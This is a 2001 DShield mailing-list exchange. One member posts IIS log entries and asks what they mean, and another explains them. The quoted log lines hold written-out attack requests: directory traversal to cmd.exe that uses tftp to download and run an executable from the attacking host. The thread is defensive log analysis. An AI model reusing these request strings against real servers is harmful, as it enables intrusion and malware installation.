[Dshield] What the heck is this? It does not look good.................

miroslaws@home.com miroslaws at home.com
Tue Aug 28 21:31:01 GMT 2001


Dear Paul,

> What the heck is this? It does not look good.................

I would agree with you. It seems to be an attempt to download to your
machine file 0.exe to your C:\temp directory. In other words, somebody (IP
216.154.60.147), who beleives in the exsitance of this security hole in your
computer,  is trying use Windows TFTP.EXE program in your computer with
option "-i" (for transfering binary mode). I think the IP 216.154.60.147
could be infected machine by something and I am not sure what.

In the first log line it is not a problem because code 404 means file is not
found.

I am concered for the next two lines because because of error 502 (server
error) means he successfuly activated (cmd.exe) binary program in your
machine. Although he achieded nothing for now it could be a valuable
information for him in planning his future attempts.

Best Regards;

Miroslaw

----- Original Message -----
From: "Paul Marsh" <pmarsh at nmefdn.org>
To: "'Dshield (E-mail)" <dshield at dshield.org>
Sent: Tuesday, August 28, 2001 12:50 PM
Subject: [Dshield] What the heck is this? It does not look
good.................


> 12:39:19 216.154.60.147 - GET
> /msadc/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 404
>  12:39:31 216.154.60.147 - GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 502
>  12:39:41 216.154.60.147 - GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe
> /c+tftp.exe+"-i"+216.154.60.147+get+0.exe+c:\temp\0.exe 502
>
> Thanx, Paul
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield
>




More information about the list mailing list